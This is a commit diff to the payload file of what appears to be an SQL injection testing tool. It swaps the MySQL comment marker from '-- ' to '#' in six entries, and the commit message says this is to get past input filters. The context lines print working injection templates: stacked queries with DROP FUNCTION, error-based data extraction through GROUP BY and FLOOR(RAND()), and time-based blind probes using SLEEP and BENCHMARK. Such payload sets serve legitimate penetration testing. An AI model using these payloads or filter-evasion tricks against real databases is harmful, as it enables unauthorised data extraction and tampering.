using MySQL comments in explicit MySQL payloads where not comments stated in title (as we already use in MySQL UNION payloads; in lots of cases minus character is either filtered or "exploded" - seen in lots of WP vulnerabilites; also, it was a false claim by myself previously that # is no longer a valid MySQL comment syntax in never versions)

2024-11-22 17:46:37 +03:00 · 2011-11-23 22:57:02 +00:00 · 2011-11-23 22:57:02 +00:00 · df4e3be191
commit df4e3be191
parent 885b432808
1 changed files with 6 additions and 6 deletions
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@ -1039,7 +1039,7 @@ Formats:
        <vector>; IF(([INFERENCE]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</vector>
        <request>
            <payload>; IF(([RANDNUM]=[RANDNUM]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
        </request>
        <response>
            <comparison>; IF(([RANDNUM]=[RANDNUM1]),SELECT [RANDNUM],DROP FUNCTION [RANDSTR]);</comparison>
@ -1402,7 +1402,7 @@ Formats:
        <vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
        <request>
            <payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
        </request>
        <response>
            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@ -1834,7 +1834,7 @@ Formats:
        <vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
        <request>
            <payload>; SELECT SLEEP([SLEEPTIME]);</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
@ -1855,7 +1855,7 @@ Formats:
        <vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
        <request>
            <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
        </request>
        <response>
            <time>[DELAYED]</time>
@ -2106,7 +2106,7 @@ Formats:
        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
        <request>
            <payload>AND SLEEP([SLEEPTIME])</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
        </request>
        <response>
            <time>[SLEEPTIME]</time>
@ -2146,7 +2146,7 @@ Formats:
        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
        <request>
            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-            <comment>-- </comment>
+            <comment>#</comment>
        </request>
        <response>
            <time>[DELAYED]</time>